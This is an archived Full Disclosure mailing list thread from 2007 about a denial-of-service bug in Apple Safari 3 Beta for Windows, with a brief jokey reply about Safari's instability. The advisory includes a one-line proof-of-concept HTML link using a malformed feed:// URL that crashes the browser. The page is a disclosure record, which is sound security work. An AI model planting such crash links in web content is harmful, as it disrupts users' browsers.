Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Apple Safari for Windows feed:// URL Denial of Service Vulnerability
From: Trancer <mtrancer () gmail com>
Date: Wed, 13 Jun 2007 04:15:56 +0300

I spent about 2 minutes until I found this.

Worse then Windows Me and Microsoft Bob?! Now you're just being mean :-)

cardoso wrote:
Are you sure it's wise to waste resources poking  Safari/Windows in
search of flaws?

The thing DOS itself, my machine (vista home premium, braz. portuguese
edition) can't run Safari for more than a few minutes, less, if I try do
actually open a website. 

I'm an Apple fanboy, proud owner of a Macbook, but I think this
abomination is the worst piece of software I ever installed, including
Windows Me and Microsoft Bob. 


On Wed, 13 Jun 2007 03:42:02 +0300
Trancer <mtrancer () gmail com> wrote:

  
Apple Safari for Windows feed:// URL Denial of Service Vulnerability

Versions: Apple Safari For Windows 3 Beta

Apple Safari for Windows is prone to a denial-of-service vulnerability 
because it fails to properly handle crafted feed:// link.

Proof-of-Concept: .
Link: feed://%
Exploit: <a href="feed://%">DoS</a>
Yes, this will crash Safari. Yes, it's that easy.
Note that this doesn't work with http://, ftp://, gopher:// and etc'.

Reference:
http://www.rec-sec.co.il/2007/06/12/apple-safari-for-windows-vulnerabilities/#exp

Credit:
Moshe Ben-Abu of BugSec is credited with discovering this vulnerability.

Vendor has been notified.

-- 
Moshe Ben-Abu :: Trancer
0nly Human...

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

-------------------------------------------------------------
Carlos Cardoso
http://www.carloscardoso.com <== blog semi-pessoal
http://www.contraditorium.com <== ProBlogging e cultura digital

"You lost today, kid. But that doesn't mean you have to like it"

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  


-- 
Moshe :: Trancer
0nly Human...

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]